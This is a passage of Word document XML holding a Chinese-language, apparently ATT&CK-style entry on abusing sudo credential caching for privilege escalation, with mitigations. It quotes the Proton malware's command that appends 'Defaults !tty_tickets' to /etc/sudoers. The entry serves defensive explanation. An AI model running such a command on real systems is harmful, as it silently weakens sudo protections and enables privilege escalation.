            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007353CB">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="007353CB">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="13B8C97E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33169E85" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>允许系统管理员委派权限，使某些用户（或用户组）能够作为根用户或其他用户运行某些（或全部）命令，同时提供命令及其参数的审核跟踪。由于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> sudo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>是为系统管理员制作的，因此它具有一些有用的配置功能，例如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t xml:space="preserve">timestamp_timeout </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>即实例之间的时间（以分钟）表示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:eastAsia="PMingLiU"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
          <w:lang w:val="zh-Hans" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>之前，它会重新提示输入密码。这是因为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:eastAsia="PMingLiU"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
          <w:lang w:val="zh-Hans" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>能够缓存一段时间的凭据。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve">Sudo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>/var/db/sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:eastAsia="PMingLiU"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
          <w:lang w:val="zh-Hans" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>下创建（或触摸）一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>文件，其时间戳为上次运行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> sudo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>的时间戳，以确定此超时。此外，还有一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>tty_ticket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:eastAsia="PMingLiU"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
          <w:lang w:val="zh-Hans" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>变量，用于隔离处理每个新</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> tty</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>（终端会话）。这意味着，例如，一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> tty </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> sudo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>超时不会影响另一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> tty</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>（您必须再次键入密码）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CC338E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="0034174F" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0034174F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>攻击者可能会滥用这种配置不佳，从而升级权限，而无需用户的密码。</w:t>
      </w:r>
      <w:r w:rsidRPr="0034174F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>/var/db/sudo</w:t>
      </w:r>
      <w:r w:rsidRPr="0034174F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>可以监视时间戳，以查看其是否位于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>timestamp_timeout</w:t>
      </w:r>
      <w:r w:rsidRPr="0034174F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>范围。如果是，则恶意软件可以执行</w:t>
      </w:r>
      <w:r w:rsidRPr="0034174F">
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> sudo </w:t>
      </w:r>
      <w:r w:rsidRPr="0034174F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>命令，而无需提供用户的密码。禁用</w:t>
      </w:r>
      <w:r w:rsidRPr="0034174F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>tty_ticket</w:t>
      </w:r>
      <w:r w:rsidRPr="0034174F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>后，攻击者可以从该用户的任何</w:t>
      </w:r>
      <w:r w:rsidRPr="0034174F">
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> tty </w:t>
      </w:r>
      <w:r w:rsidRPr="0034174F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>执行此操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E27CE5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve">OSX </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>质子恶意软件已禁用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>tty_ticket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>通过发出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>echo \'Defaults !tty_tickets\' &gt;&gt; /etc/sudoers</w:t>
      </w:r>
      <w:r w:rsidRPr="0034174F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>使脚本编写更加容易</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>为了反映此更改，质子恶意软件还必须发出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>killall Terminal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>截至</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> macOS Sierra</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve">sudoers </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>文件默认启用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>tty_ticket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDE1A68" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="0034174F" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FA7F0FB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2294"/>
        <w:gridCol w:w="7442"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="005512DF" w14:paraId="1AE2156D" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2294" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="78D4A7EB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="005512DF" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005512DF">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解方法</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7442" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="113AE14E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="005512DF" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005512DF">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w14:paraId="5C5AC0EA" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2294" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E5CB0E4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
                <w:color w:val="39434C"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>操作系统配置</w:t>
            </w:r>
            <w:hyperlink r:id="rId100" w:history="1"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7442" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74FB00CD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
                <w:color w:val="39434C"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>同样，确保启用</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>tty_ticket</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>设置将防止跨</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t xml:space="preserve"> tty </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>会话的这种泄漏</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w14:paraId="2FE1DF2D" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2294" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20A7C85F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
                <w:color w:val="39434C"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>特权</w:t>
            </w:r>
            <w:r>
              <w:t>账户管理</w:t>
            </w:r>
            <w:hyperlink r:id="rId101" w:history="1"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7442" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5FBEA58C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
                <w:color w:val="39434C"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>设置</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
              </w:rPr>
              <w:t>timestamp_timeout</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>到</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t xml:space="preserve"> 0 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>，要求用户每次执行</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>时输入其</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>密码。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="073B89BB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
